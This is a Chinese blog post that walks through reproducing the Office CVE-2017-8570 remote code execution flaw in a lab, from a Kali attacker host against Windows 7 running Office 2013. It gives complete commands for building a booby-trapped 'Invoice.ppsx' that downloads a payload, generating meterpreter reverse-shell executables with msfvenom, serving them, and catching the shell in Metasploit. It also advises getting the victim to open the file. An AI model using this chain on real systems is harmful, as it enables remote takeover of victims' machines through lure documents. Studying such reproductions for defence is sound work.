Office CVE-2017-8570远程代码执行漏洞复现

2024-06-01 17:38

本文主要是介绍Office CVE-2017-8570远程代码执行漏洞复现,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

Office CVE-2017-8570远程代码执行漏洞复现

漏洞影响版本

  • Microsoft Office 2007 Service Pack 3
  • Microsoft Office 2010 Service Pack 2 (32-bit editions)
  • Microsoft Office 2010 Service Pack 2 (64-bit editions)
  • Microsoft Office 2013 RT Service Pack 1
  • Microsoft Office 2013 Service Pack 1 (32-bit editions)
  • Microsoft Office 2013 Service Pack 1 (64-bit editions)
  • Microsoft Office 2016 (32-bit edition)
  • Microsoft Office 2016 (64-bit edition)
复现环境:
  • 攻击机:系统:kallinux 32位 IP:192.168.1.194 metasploit
  • 目标机:系统:window7旗舰版 IP:192.168.1.133 Microsoft Office 2013

1、生成恶意文件:

python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://192.168.1.194/logo.doc
注意:

  • 1、这里的IP是攻击机IP
  • 2、Invoice.ppsx为生成的恶意文件
  • 3、这里可能会报一个错误:
    IOError: [Errno 2] No such file or directory: ‘template/template.ppsx’
    image
    这里郁闷了很久,各种查资料,才知道这里是文件中的一个路径有问题!
    在文件cve-2017-8570_toolkit.py中有一个文件路径需要修改:
    image
    修改后为此文件(template.ppsx)所在路径:
    如我现在的文件为/root/Office8570-master/文件夹下,所以修改成:

image
接下来执行第一步生成恶意文件命令就不会报错了!
image
生成的恶意文件:
image


2、生成反弹shell文件

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.194 LPORT=6666 -f exe > shell.exe
设置反弹shell的ip192.168.1.194,和监听端口6666
命令执行成功:
image
生成的shell文件
image
当然了,如果目标机是64位机器那么需要执行不一样的命令:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.103 LPORT=6666 -f exe > shell64.exe
命令执行成功
image
生成shell64文件
image


### 3、监听会话(来自ppsx执行反弹shell)

执行命令(32位目标机):
python cve-2017-8570_toolkit.py -M exp -e http://192.168.1.194/shell.exe -l shell.exe
过脚本在80端口监听,等待接收ppsx请求并下载执行的反弹木马
命令执行成功监听服务启动:
image
接下来进入Metasploit,新建一个Kali 192.168.1.194的连接,设置相关参数,接受返回的Shell:
msfconsole
image

msf > use exploit/multi/handler
image
msf > set LHOST 192.168.1.194
image
msf > set LPORT 6666
image
msf > set PAYLOAD windows/meterpreter/reverse_tcp
image
msf > exploit
image

同样,这里攻击64位操作系统的时候,需执行如下命令(这里我没有执行):
msf > set pauload windows/x64/meterpreter/reverse_tcp


### 4、漏洞执行

最后将我们生成好的恶意文件发送给目标机,并让目标机打开文件。我这里是kalinux运行在虚拟机中,所以讲恶意文件直接拖到win7中,然后执行文件就行了。
image
文件运行(如果将文件发给别人,必须要让别人打开此文件,否则不可成功,另外图没有截好T_T)
image
Shell反弹显示get到了目标机
image
然后再meterpreter中可以直接执行ls命令,如下:
image
可见win7桌面上的文件:
我们还可以直接执行shell命令,那么就可以直接执行win7下的DOS命令了:
image



这篇关于Office CVE-2017-8570远程代码执行漏洞复现的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1021679

相关文章

Xshell远程连接失败以及解决方案

《Xshell远程连接失败以及解决方案》本文介绍了在Windows11家庭版和CentOS系统中解决Xshell无法连接远程服务器问题的步骤,在Windows11家庭版中,需要通过设置添加SSH功能并... 目录一.问题描述二.原因分析及解决办法2.1添加ssh功能2.2 在Windows中开启ssh服务2

Python实现局域网远程控制电脑

《Python实现局域网远程控制电脑》这篇文章主要为大家详细介绍了如何利用Python编写一个工具,可以实现远程控制局域网电脑关机,重启,注销等功能,感兴趣的小伙伴可以参考一下... 目录1.简介2. 运行效果3. 1.0版本相关源码服务端server.py客户端client.py4. 2.0版本相关源码1

解决Office Word不能切换中文输入

我们在使用WORD的时可能会经常碰到WORD中无法输入中文的情况。因为,虽然我们安装了搜狗输入法,但是到我们在WORD中使用搜狗的输入法的切换中英文的按键的时候会发现根本没有效果,无法将输入法切换成中文的。下面我就介绍一下如何在WORD中把搜狗输入法切换到中文。

Detectorn2预训练模型复现:数据准备、训练命令、日志分析与输出目录

Detectorn2预训练模型复现:数据准备、训练命令、日志分析与输出目录 在深度学习项目中,目标检测是一项重要的任务。本文将详细介绍如何使用Detectron2进行目标检测模型的复现训练,涵盖训练数据准备、训练命令、训练日志分析、训练指标以及训练输出目录的各个文件及其作用。特别地,我们将演示在训练过程中出现中断后,如何使用 resume 功能继续训练,并将我们复现的模型与Model Zoo中的

远程工具-SecureCRT/SecureFX

下载地址: https://www.portablesoft.org/securecrt-securefx-integrated/

UMI复现代码运行逻辑全流程(一)——eval_real.py(尚在更新)

一、文件夹功能解析 全文件夹如下 其中,核心文件作用为: diffusion_policy:扩散策略核心文件夹,包含了众多模型及基础库 example:标定及配置文件 scripts/scripts_real:测试脚本文件,区别在于前者倾向于单体运行,后者为整体运行 scripts_slam_pipeline:orb_slam3运行全部文件 umi:核心交互文件夹,作用在于构建真

文章解读与仿真程序复现思路——电力自动化设备EI\CSCD\北大核心《考虑燃料电池和电解槽虚拟惯量支撑的电力系统优化调度方法》

本专栏栏目提供文章与程序复现思路,具体已有的论文与论文源程序可翻阅本博主免费的专栏栏目《论文与完整程序》 论文与完整源程序_电网论文源程序的博客-CSDN博客https://blog.csdn.net/liang674027206/category_12531414.html 电网论文源程序-CSDN博客电网论文源程序擅长文章解读,论文与完整源程序,等方面的知识,电网论文源程序关注python

【微服务】Ribbon(负载均衡,服务调用)+ OpenFeign(服务发现,远程调用)【详解】

文章目录 1.Ribbon(负载均衡,服务调用)1.1问题引出1.2 Ribbon负载均衡1.3 RestTemplate整合Ribbon1.4 指定Ribbon负载均衡策略1.4.1 配置文件1.4.2 配置类1.4.3 定义Ribbon客户端配置1.4.4 自定义负载均衡策略 2.OpenFeign面向接口的服务调用(服务发现,远程调用)2.1 OpenFeign的使用2.1 .1创建

【CTF Web】BUUCTF Upload-Labs-Linux Pass-13 Writeup(文件上传+PHP+文件包含漏洞+PNG图片马)

Upload-Labs-Linux 1 点击部署靶机。 简介 upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共20关,每一关都包含着不同上传方式。 注意 1.每一关没有固定的通关方法,大家不要自限思维! 2.本项目提供的writeup只是起一个参考作用,希望大家可以分享出自己的通关思路

如何删除不小心上传到git远程仓库中的.idea .iml文件

如果在开始的时候不配置,gitignore文件或者文件配置不正确,初始化上传的时候就会有一些不必要的信息上传上去 如果已经存在了一些文件在git远程仓库中,如。idea,.iml文件等。 首先在项目中定义一个  .gitignore文件,简单的实例如下也可以用idea中的gitignore插件 .DS_Storeclasses/*.settings/target/.classpath